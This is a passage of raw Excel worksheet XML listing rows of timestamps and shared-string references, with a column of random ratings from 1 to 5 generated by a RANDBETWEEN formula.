      <c r="C24192" t="s">
        <v>10</v>
      </c>
      <c r="D24192" t="s">
        <v>36</v>
      </c>
      <c r="E24192" t="s">
        <v>21915</v>
      </c>
      <c r="F24192">
        <f t="shared" ca="1" si="377"/>
        <v>1</v>
      </c>
    </row>
    <row r="24193" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24193" s="1">
        <v>42996.356226851851</v>
      </c>
      <c r="C24193" t="s">
        <v>10</v>
      </c>
      <c r="E24193" t="s">
        <v>21916</v>
      </c>
      <c r="F24193">
        <f t="shared" ca="1" si="377"/>
        <v>5</v>
      </c>
    </row>
    <row r="24194" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24194" s="1">
        <v>42996.355995370373</v>
      </c>
      <c r="C24194" t="s">
        <v>10</v>
      </c>
      <c r="D24194" t="s">
        <v>6</v>
      </c>
      <c r="E24194" t="s">
        <v>21916</v>
      </c>
      <c r="F24194">
        <f t="shared" ref="F24194:F24257" ca="1" si="378">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="24195" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24195" s="1">
        <v>42996.347048611111</v>
      </c>
      <c r="C24195" t="s">
        <v>41</v>
      </c>
      <c r="E24195" s="2" t="s">
        <v>21917</v>
      </c>
      <c r="F24195">
        <f t="shared" ca="1" si="378"/>
        <v>1</v>
      </c>
    </row>
    <row r="24196" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24196" s="1">
        <v>42996.33766203704</v>
      </c>
      <c r="C24196" t="s">
        <v>166</v>
      </c>
      <c r="E24196" t="s">
        <v>21918</v>
      </c>
      <c r="F24196">
        <f t="shared" ca="1" si="378"/>
        <v>4</v>
      </c>
    </row>
    <row r="24197" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24197" s="1">
        <v>42996.279432870368</v>
      </c>
      <c r="C24197" t="s">
        <v>178</v>
      </c>
      <c r="D24197" t="s">
        <v>312</v>
      </c>
      <c r="E24197" s="2" t="s">
        <v>21919</v>
      </c>
      <c r="F24197">
        <f t="shared" ca="1" si="378"/>
        <v>3</v>
      </c>
    </row>
    <row r="24198" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24198" s="1">
        <v>42996.27715277778</v>
      </c>
      <c r="C24198" t="s">
        <v>48</v>
      </c>
      <c r="E24198" t="s">
        <v>21920</v>
      </c>
      <c r="F24198">
        <f t="shared" ca="1" si="378"/>
        <v>4</v>
      </c>
    </row>
    <row r="24199" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24199" s="1">
        <v>42996.242534722223</v>
      </c>
      <c r="C24199" t="s">
        <v>65</v>
      </c>
      <c r="E24199" t="s">
        <v>21921</v>
      </c>
      <c r="F24199">
        <f t="shared" ca="1" si="378"/>
        <v>1</v>
      </c>
    </row>
    <row r="24200" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A24200" s="1">
        <v>42996.196458333332</v>
      </c>
      <c r="C24200" t="s">
        <v>71</v>
      </c>
      <c r="E24200" s="2" t="s">
        <v>21922</v>
      </c>
      <c r="F24200">
        <f t="shared" ca="1" si="378"/>
        <v>3</v>
      </c>
    </row>
    <row r="24201" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24201" s="1">
        <v>42996.192164351851</v>
      </c>
      <c r="C24201" t="s">
        <v>3515</v>
      </c>
      <c r="E24201" s="2" t="s">
        <v>21923</v>
      </c>
      <c r="F24201">
        <f t="shared" ca="1" si="378"/>
        <v>5</v>
      </c>
    </row>
    <row r="24202" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A24202" s="1">
        <v>42996.102569444447</v>
      </c>
      <c r="C24202" t="s">
        <v>3515</v>
      </c>
      <c r="E24202" s="2" t="s">
        <v>21924</v>
      </c>
      <c r="F24202">
        <f t="shared" ca="1" si="378"/>
        <v>5</v>
      </c>
    </row>
    <row r="24203" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24203" s="1">
        <v>42996.097118055557</v>
      </c>
      <c r="C24203" t="s">
        <v>41</v>
      </c>
      <c r="E24203" t="s">
        <v>21925</v>
      </c>
      <c r="F24203">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24204" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24204" s="1">
        <v>42996.05023148148</v>
      </c>
      <c r="C24204" t="s">
        <v>410</v>
      </c>
      <c r="E24204" t="s">
        <v>21926</v>
      </c>
      <c r="F24204">
        <f t="shared" ca="1" si="378"/>
        <v>4</v>
      </c>
    </row>
    <row r="24205" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24205" s="1">
        <v>42996.001597222225</v>
      </c>
      <c r="C24205" t="s">
        <v>410</v>
      </c>
      <c r="E24205" t="s">
        <v>21927</v>
      </c>
      <c r="F24205">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24206" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A24206" s="1">
        <v>42996.001192129632</v>
      </c>
      <c r="C24206" t="s">
        <v>410</v>
      </c>
      <c r="E24206" s="2" t="s">
        <v>21928</v>
      </c>
      <c r="F24206">
        <f t="shared" ca="1" si="378"/>
        <v>4</v>
      </c>
    </row>
    <row r="24207" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24207" s="1">
        <v>42995.996712962966</v>
      </c>
      <c r="C24207" t="s">
        <v>10</v>
      </c>
      <c r="D24207" t="s">
        <v>41</v>
      </c>
      <c r="E24207" t="s">
        <v>21929</v>
      </c>
      <c r="F24207">
        <f t="shared" ca="1" si="378"/>
        <v>1</v>
      </c>
    </row>
    <row r="24208" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24208" s="1">
        <v>42995.922222222223</v>
      </c>
      <c r="C24208" t="s">
        <v>10</v>
      </c>
      <c r="D24208" t="s">
        <v>89</v>
      </c>
      <c r="E24208" t="s">
        <v>21930</v>
      </c>
      <c r="F24208">
        <f t="shared" ca="1" si="378"/>
        <v>3</v>
      </c>
    </row>
    <row r="24209" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24209" s="1">
        <v>42995.134583333333</v>
      </c>
      <c r="C24209" t="s">
        <v>197</v>
      </c>
      <c r="E24209" t="s">
        <v>21931</v>
      </c>
      <c r="F24209">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24210" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24210" s="1">
        <v>42995.036597222221</v>
      </c>
      <c r="C24210" t="s">
        <v>10</v>
      </c>
      <c r="D24210" t="s">
        <v>33</v>
      </c>
      <c r="E24210" t="s">
        <v>21932</v>
      </c>
      <c r="F24210">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24211" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24211" s="1">
        <v>42995.035532407404</v>
      </c>
      <c r="C24211" t="s">
        <v>10</v>
      </c>
      <c r="D24211" t="s">
        <v>33</v>
      </c>
      <c r="E24211" t="s">
        <v>21933</v>
      </c>
      <c r="F24211">
        <f t="shared" ca="1" si="378"/>
        <v>5</v>
      </c>
    </row>
    <row r="24212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24212" s="1">
        <v>42995.004444444443</v>
      </c>
      <c r="C24212" t="s">
        <v>41</v>
      </c>
      <c r="E24212" t="s">
        <v>21934</v>
      </c>
      <c r="F24212">
        <f t="shared" ca="1" si="378"/>
        <v>4</v>
      </c>
    </row>
    <row r="24213" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24213" s="1">
        <v>42994.446504629632</v>
      </c>
      <c r="C24213" t="s">
        <v>471</v>
      </c>
      <c r="E24213" s="2" t="s">
        <v>21935</v>
      </c>
      <c r="F24213">
        <f t="shared" ca="1" si="378"/>
        <v>5</v>
      </c>
    </row>
    <row r="24214" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24214" s="1">
        <v>42994.421006944445</v>
      </c>
      <c r="C24214" t="s">
        <v>118</v>
      </c>
      <c r="E24214" t="s">
        <v>21936</v>
      </c>
      <c r="F24214">
        <f t="shared" ca="1" si="378"/>
        <v>4</v>
      </c>
    </row>
    <row r="24215" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24215" s="1">
        <v>42994.380810185183</v>
      </c>
      <c r="C24215" t="s">
        <v>10</v>
      </c>
      <c r="D24215" t="s">
        <v>23</v>
      </c>
      <c r="E24215" t="s">
        <v>21937</v>
      </c>
      <c r="F24215">
        <f t="shared" ca="1" si="378"/>
        <v>1</v>
      </c>
    </row>
    <row r="24216" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24216" s="1">
        <v>42994.310069444444</v>
      </c>
      <c r="C24216" t="s">
        <v>1440</v>
      </c>
      <c r="E24216" t="s">
        <v>21938</v>
      </c>
      <c r="F24216">
        <f t="shared" ca="1" si="378"/>
        <v>5</v>
      </c>
    </row>
    <row r="24217" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24217" s="1">
        <v>42994.082997685182</v>
      </c>
      <c r="C24217" t="s">
        <v>92</v>
      </c>
      <c r="E24217" t="s">
        <v>21939</v>
      </c>
      <c r="F24217">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24218" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24218" s="1">
        <v>42993.997557870367</v>
      </c>
      <c r="C24218" t="s">
        <v>41</v>
      </c>
      <c r="E24218" t="s">
        <v>21940</v>
      </c>
      <c r="F24218">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24219" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24219" s="1">
        <v>42993.689386574071</v>
      </c>
      <c r="C24219" t="s">
        <v>10</v>
      </c>
      <c r="D24219" t="s">
        <v>178</v>
      </c>
      <c r="E24219" t="s">
        <v>21941</v>
      </c>
      <c r="F24219">
        <f t="shared" ca="1" si="378"/>
        <v>3</v>
      </c>
    </row>
    <row r="24220" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24220" s="1">
        <v>42993.628229166665</v>
      </c>
      <c r="C24220" t="s">
        <v>10</v>
      </c>
      <c r="D24220" t="s">
        <v>290</v>
      </c>
      <c r="E24220" t="s">
        <v>21942</v>
      </c>
      <c r="F24220">
        <f t="shared" ca="1" si="378"/>
        <v>3</v>
      </c>
    </row>
    <row r="24221" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24221" s="1">
        <v>42993.621770833335</v>
      </c>
      <c r="C24221" t="s">
        <v>10</v>
      </c>
      <c r="E24221" s="2" t="s">
        <v>21943</v>
      </c>
      <c r="F24221">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24222" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24222" s="1">
        <v>42993.593715277777</v>
      </c>
      <c r="C24222" t="s">
        <v>29</v>
      </c>
      <c r="E24222" s="2" t="s">
        <v>21944</v>
      </c>
      <c r="F24222">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24223" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24223" s="1">
        <v>42993.593217592592</v>
      </c>
      <c r="C24223" t="s">
        <v>29</v>
      </c>
      <c r="E24223" s="2" t="s">
        <v>21945</v>
      </c>
      <c r="F24223">
        <f t="shared" ca="1" si="378"/>
        <v>5</v>
      </c>
    </row>
    <row r="24224" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24224" s="1">
        <v>42993.558495370373</v>
      </c>
      <c r="C24224" t="s">
        <v>6</v>
      </c>
      <c r="D24224" t="s">
        <v>114</v>
      </c>
      <c r="E24224" s="2" t="s">
        <v>21946</v>
      </c>
      <c r="F24224">
        <f t="shared" ca="1" si="378"/>
        <v>1</v>
      </c>
    </row>
    <row r="24225" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24225" s="1">
        <v>42993.535590277781</v>
      </c>
      <c r="C24225" t="s">
        <v>10</v>
      </c>
      <c r="D24225" t="s">
        <v>494</v>
      </c>
      <c r="E24225" s="2" t="s">
        <v>21947</v>
      </c>
      <c r="F24225">
        <f t="shared" ca="1" si="378"/>
        <v>4</v>
      </c>
    </row>
    <row r="24226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24226" s="1">
        <v>42993.517534722225</v>
      </c>
      <c r="C24226" t="s">
        <v>318</v>
      </c>
      <c r="E24226" t="s">
        <v>21948</v>
      </c>
      <c r="F24226">
        <f t="shared" ca="1" si="378"/>
        <v>3</v>
      </c>
    </row>
    <row r="24227" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24227" s="1">
        <v>42993.507604166669</v>
      </c>
      <c r="C24227" t="s">
        <v>10</v>
      </c>
      <c r="D24227" t="s">
        <v>56</v>
      </c>
      <c r="E24227" t="s">
        <v>21949</v>
      </c>
      <c r="F24227">
        <f t="shared" ca="1" si="378"/>
        <v>5</v>
      </c>
    </row>
    <row r="24228" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24228" s="1">
        <v>42993.502175925925</v>
      </c>
      <c r="C24228" t="s">
        <v>82</v>
      </c>
      <c r="E24228" s="2" t="s">
        <v>21950</v>
      </c>
      <c r="F24228">
        <f t="shared" ca="1" si="378"/>
        <v>3</v>
      </c>
    </row>
    <row r="24229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24229" s="1">
        <v>42993.475243055553</v>
      </c>
      <c r="C24229" t="s">
        <v>10</v>
      </c>
      <c r="D24229" t="s">
        <v>52</v>
      </c>
      <c r="F24229">
        <f t="shared" ca="1" si="378"/>
        <v>4</v>
      </c>
    </row>
    <row r="24230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24230" s="1">
        <v>42993.468865740739</v>
      </c>
      <c r="C24230" t="s">
        <v>10</v>
      </c>
      <c r="D24230" t="s">
        <v>11</v>
      </c>
      <c r="E24230" t="s">
        <v>21951</v>
      </c>
      <c r="F24230">
        <f t="shared" ca="1" si="378"/>
        <v>4</v>
      </c>
    </row>
    <row r="24231" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24231" s="1">
        <v>42993.461192129631</v>
      </c>
      <c r="C24231" t="s">
        <v>10</v>
      </c>
      <c r="D24231" t="s">
        <v>23</v>
      </c>
      <c r="E24231" s="2" t="s">
        <v>21952</v>
      </c>
      <c r="F24231">
        <f t="shared" ca="1" si="378"/>
        <v>1</v>
      </c>
    </row>
    <row r="24232" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A24232" s="1">
        <v>42993.447083333333</v>
      </c>
      <c r="C24232" t="s">
        <v>71</v>
      </c>
      <c r="E24232" s="2" t="s">
        <v>21953</v>
      </c>
      <c r="F24232">
        <f t="shared" ca="1" si="378"/>
        <v>3</v>
      </c>
    </row>
    <row r="24233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24233" s="1">
        <v>42993.427152777775</v>
      </c>
      <c r="C24233" t="s">
        <v>10</v>
      </c>
      <c r="D24233" t="s">
        <v>89</v>
      </c>
      <c r="E24233" t="s">
        <v>21954</v>
      </c>
      <c r="F24233">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24234" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24234" s="1">
        <v>42993.422847222224</v>
      </c>
      <c r="C24234" t="s">
        <v>1189</v>
      </c>
      <c r="E24234" t="s">
        <v>21955</v>
      </c>
      <c r="F24234">
        <f t="shared" ca="1" si="378"/>
        <v>4</v>
      </c>
    </row>
    <row r="24235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24235" s="1">
        <v>42993.412893518522</v>
      </c>
      <c r="C24235" t="s">
        <v>10</v>
      </c>
      <c r="D24235" t="s">
        <v>192</v>
      </c>
      <c r="E24235" t="s">
        <v>21956</v>
      </c>
      <c r="F24235">
        <f t="shared" ca="1" si="378"/>
        <v>1</v>
      </c>
    </row>
    <row r="24236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24236" s="1">
        <v>42993.391585648147</v>
      </c>
      <c r="C24236" t="s">
        <v>10</v>
      </c>
      <c r="D24236" t="s">
        <v>1160</v>
      </c>
      <c r="E24236" t="s">
        <v>21957</v>
      </c>
      <c r="F24236">
        <f t="shared" ca="1" si="378"/>
        <v>5</v>
      </c>
    </row>
    <row r="24237" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A24237" s="1">
        <v>42993.380648148152</v>
      </c>
      <c r="C24237" t="s">
        <v>48</v>
      </c>
      <c r="E24237" s="2" t="s">
        <v>21958</v>
      </c>
      <c r="F24237">
        <f t="shared" ca="1" si="378"/>
        <v>1</v>
      </c>
    </row>
    <row r="24238" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24238" s="1">
        <v>42993.371018518519</v>
      </c>
      <c r="C24238" t="s">
        <v>10</v>
      </c>
      <c r="D24238" t="s">
        <v>23</v>
      </c>
      <c r="E24238" t="s">
        <v>21959</v>
      </c>
      <c r="F24238">
        <f t="shared" ca="1" si="378"/>
        <v>1</v>
      </c>
    </row>
    <row r="24239" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24239" s="1">
        <v>42993.366863425923</v>
      </c>
      <c r="C24239" t="s">
        <v>10</v>
      </c>
      <c r="D24239" t="s">
        <v>163</v>
      </c>
      <c r="E24239" t="s">
        <v>21960</v>
      </c>
      <c r="F24239">
        <f t="shared" ca="1" si="378"/>
        <v>3</v>
      </c>
    </row>
    <row r="24240" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A24240" s="1">
        <v>42993.356828703705</v>
      </c>
      <c r="C24240" t="s">
        <v>10</v>
      </c>
      <c r="D24240" t="s">
        <v>6</v>
      </c>
      <c r="E24240" s="2" t="s">
        <v>21961</v>
      </c>
      <c r="F24240">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24241" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24241" s="1">
        <v>42993.352002314816</v>
      </c>
      <c r="C24241" t="s">
        <v>10</v>
      </c>
      <c r="D24241" t="s">
        <v>112</v>
      </c>
      <c r="E24241" t="s">
        <v>21962</v>
      </c>
      <c r="F24241">
        <f t="shared" ca="1" si="378"/>
        <v>5</v>
      </c>
    </row>
    <row r="24242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24242" s="1">
        <v>42993.3516087963</v>
      </c>
      <c r="C24242" t="s">
        <v>10</v>
      </c>
      <c r="D24242" t="s">
        <v>112</v>
      </c>
      <c r="E24242" t="s">
        <v>21963</v>
      </c>
      <c r="F24242">
        <f t="shared" ca="1" si="378"/>
        <v>5</v>
      </c>
    </row>
    <row r="24243" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24243" s="1">
        <v>42993.342418981483</v>
      </c>
      <c r="C24243" t="s">
        <v>41</v>
      </c>
      <c r="E24243" s="2" t="s">
        <v>21964</v>
      </c>
      <c r="F24243">
        <f t="shared" ca="1" si="378"/>
        <v>4</v>
      </c>
    </row>
    <row r="24244" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24244" s="1">
        <v>42993.34097222222</v>
      </c>
      <c r="C24244" t="s">
        <v>41</v>
      </c>
      <c r="F24244">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24245" s="1">
        <v>42993.340520833335</v>
      </c>
      <c r="C24245" t="s">
        <v>10</v>
      </c>
      <c r="D24245" t="s">
        <v>36</v>
      </c>
      <c r="E24245" t="s">
        <v>21965</v>
      </c>
      <c r="F24245">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24246" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A24246" s="1">
        <v>42993.324618055558</v>
      </c>
      <c r="C24246" t="s">
        <v>43</v>
      </c>
      <c r="E24246" s="2" t="s">
        <v>21966</v>
      </c>
      <c r="F24246">
        <f t="shared" ca="1" si="378"/>
        <v>5</v>
      </c>
    </row>
    <row r="24247" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24247" s="1">
        <v>42993.29650462963</v>
      </c>
      <c r="C24247" t="s">
        <v>60</v>
      </c>
      <c r="E24247" t="s">
        <v>21967</v>
      </c>
      <c r="F24247">
        <f t="shared" ca="1" si="378"/>
        <v>3</v>
      </c>
    </row>
    <row r="24248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24248" s="1">
        <v>42993.277974537035</v>
      </c>
      <c r="C24248" t="s">
        <v>41</v>
      </c>
      <c r="E24248" t="s">
        <v>21968</v>
      </c>
      <c r="F24248">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24249" s="1">
        <v>42993.275000000001</v>
      </c>
      <c r="C24249" t="s">
        <v>41</v>
      </c>
      <c r="F24249">
        <f t="shared" ca="1" si="378"/>
        <v>1</v>
      </c>
    </row>
    <row r="24250" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A24250" s="1">
        <v>42993.273738425924</v>
      </c>
      <c r="C24250" t="s">
        <v>50</v>
      </c>
      <c r="E24250" s="2" t="s">
        <v>21969</v>
      </c>
      <c r="F24250">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24251" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A24251" s="1">
        <v>42993.230023148149</v>
      </c>
      <c r="C24251" t="s">
        <v>65</v>
      </c>
      <c r="E24251" s="2" t="s">
        <v>21970</v>
      </c>
      <c r="F24251">
        <f t="shared" ca="1" si="378"/>
        <v>1</v>
      </c>
    </row>
    <row r="24252" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A24252" s="1">
        <v>42993.185381944444</v>
      </c>
      <c r="C24252" t="s">
        <v>65</v>
      </c>
      <c r="E24252" s="2" t="s">
        <v>21971</v>
      </c>
      <c r="F24252">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24253" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24253" s="1">
        <v>42993.176701388889</v>
      </c>
      <c r="C24253" t="s">
        <v>41</v>
      </c>
      <c r="E24253" t="s">
        <v>21972</v>
      </c>
      <c r="F24253">
        <f t="shared" ca="1" si="378"/>
        <v>4</v>
      </c>
    </row>
    <row r="24254" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A24254" s="1">
        <v>42993.104027777779</v>
      </c>
      <c r="C24254" t="s">
        <v>10</v>
      </c>
      <c r="D24254" t="s">
        <v>6</v>
      </c>
      <c r="E24254" s="2" t="s">
        <v>21973</v>
      </c>
      <c r="F24254">
        <f t="shared" ca="1" si="378"/>
        <v>5</v>
      </c>
    </row>
    <row r="24255" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24255" s="1">
        <v>42992.828136574077</v>
      </c>
      <c r="C24255" t="s">
        <v>140</v>
      </c>
      <c r="D24255" t="s">
        <v>234</v>
      </c>
      <c r="E24255" t="s">
        <v>21974</v>
      </c>
      <c r="F24255">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24256" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24256" s="1">
        <v>42992.827407407407</v>
      </c>
      <c r="C24256" t="s">
        <v>140</v>
      </c>
      <c r="D24256" t="s">
        <v>234</v>
      </c>
      <c r="E24256" t="s">
        <v>21974</v>
      </c>
      <c r="F24256">
        <f t="shared" ca="1" si="378"/>
        <v>2</v>
      </c>
    </row>
    <row r="24257" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A24257" s="1">
        <v>42992.803229166668</v>
      </c>
      <c r="C24257" t="s">
        <v>10</v>
      </c>
      <c r="D24257" t="s">
        <v>46</v>
      </c>
      <c r="E24257" s="2" t="s">
        <v>21975</v>
      </c>
      <c r="F24257">
        <f t="shared" ca="1" si="378"/>
        <v>3</v>
      </c>
    </row>
    <row r="24258" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24258" s="1">
        <v>42992.776863425926</v>
      </c>
      <c r="C24258" t="s">
        <v>10</v>
      </c>
      <c r="D24258" t="s">
        <v>1091</v>
      </c>
      <c r="E24258" t="s">
        <v>21976</v>
      </c>
      <c r="F24258">
        <f t="shared" ref="F24258:F24321" ca="1" si="379">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="24259" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A24259" s="1">
        <v>42992.76289351852</v>
      </c>
      <c r="C24259" t="s">
        <v>10</v>
      </c>
      <c r="D24259" t="s">
        <v>192</v>
      </c>
      <c r="E24259" s="2" t="s">
        <v>21977</v>
      </c>
      <c r="F24259">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24260" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24260" s="1">
        <v>42992.730185185188</v>
      </c>
      <c r="C24260" t="s">
        <v>10</v>
      </c>
      <c r="D24260" t="s">
        <v>89</v>
      </c>
      <c r="E24260" t="s">
        <v>21978</v>
      </c>
      <c r="F24260">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24261" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24261" s="1">
        <v>42992.723530092589</v>
      </c>
      <c r="C24261" t="s">
        <v>10</v>
      </c>
      <c r="D24261" t="s">
        <v>158</v>
      </c>
      <c r="E24261" t="s">
        <v>21979</v>
      </c>
      <c r="F24261">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24262" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24262" s="1">
        <v>42992.626620370371</v>
      </c>
      <c r="C24262" t="s">
        <v>10</v>
      </c>
      <c r="D24262" t="s">
        <v>107</v>
      </c>
      <c r="E24262" t="s">
        <v>21980</v>
      </c>
      <c r="F24262">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24263" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24263" s="1">
        <v>42992.602199074077</v>
      </c>
      <c r="C24263" t="s">
        <v>6</v>
      </c>
      <c r="D24263" t="s">
        <v>25</v>
      </c>
      <c r="E24263" t="s">
        <v>21981</v>
      </c>
      <c r="F24263">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24264" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24264" s="1">
        <v>42992.601226851853</v>
      </c>
      <c r="C24264" t="s">
        <v>10</v>
      </c>
      <c r="D24264" t="s">
        <v>56</v>
      </c>
      <c r="E24264" t="s">
        <v>21982</v>
      </c>
      <c r="F24264">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24265" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24265" s="1">
        <v>42992.574236111112</v>
      </c>
      <c r="C24265" t="s">
        <v>10</v>
      </c>
      <c r="D24265" t="s">
        <v>52</v>
      </c>
      <c r="E24265" t="s">
        <v>21983</v>
      </c>
      <c r="F24265">
        <f t="shared" ca="1" si="379"/>
        <v>2</v>
      </c>
    </row>
    <row r="24266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24266" s="1">
        <v>42992.573831018519</v>
      </c>
      <c r="C24266" t="s">
        <v>10</v>
      </c>
      <c r="D24266" t="s">
        <v>6</v>
      </c>
      <c r="E24266" t="s">
        <v>21984</v>
      </c>
      <c r="F24266">
        <f t="shared" ca="1" si="379"/>
        <v>5</v>
      </c>
    </row>
    <row r="24267" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A24267" s="1">
        <v>42992.561076388891</v>
      </c>
      <c r="C24267" t="s">
        <v>10</v>
      </c>
      <c r="D24267" t="s">
        <v>6</v>
      </c>
      <c r="E24267" s="2" t="s">
        <v>21985</v>
      </c>
      <c r="F24267">
        <f t="shared" ca="1" si="379"/>
        <v>5</v>
      </c>
    </row>
    <row r="24268" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A24268" s="1">
        <v>42992.546747685185</v>
      </c>
      <c r="C24268" t="s">
        <v>6</v>
      </c>
      <c r="D24268" t="s">
        <v>114</v>
      </c>
      <c r="E24268" s="2" t="s">
        <v>21986</v>
      </c>
      <c r="F24268">
        <f t="shared" ca="1" si="379"/>
        <v>1</v>
      </c>
    </row>
    <row r="24269" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24269" s="1">
        <v>42992.531331018516</v>
      </c>
      <c r="C24269" t="s">
        <v>41</v>
      </c>
      <c r="E24269" t="s">
        <v>21987</v>
      </c>
      <c r="F24269">
        <f t="shared" ca="1" si="379"/>
        <v>4</v>
      </c>
    </row>
    <row r="24270" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24270" s="1">
        <v>42992.524386574078</v>
      </c>
      <c r="C24270" t="s">
        <v>10</v>
      </c>
      <c r="D24270" t="s">
        <v>23</v>
      </c>
      <c r="E24270" t="s">
        <v>21988</v>
      </c>
      <c r="F24270">
        <f t="shared" ca="1" si="379"/>
        <v>3</v>
      </c>
    </row>
    <row r="24271" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A24271" s="1">
        <v>42992.52034722222</v>
      </c>
      <c r="C24271" t="s">
        <v>10</v>
      </c>
      <c r="D24271" t="s">
        <v>6</v>
      </c>
      <c r="E24271" s="2" t="s">
        <v>21989</v>
      </c>
      <c r="F24271">
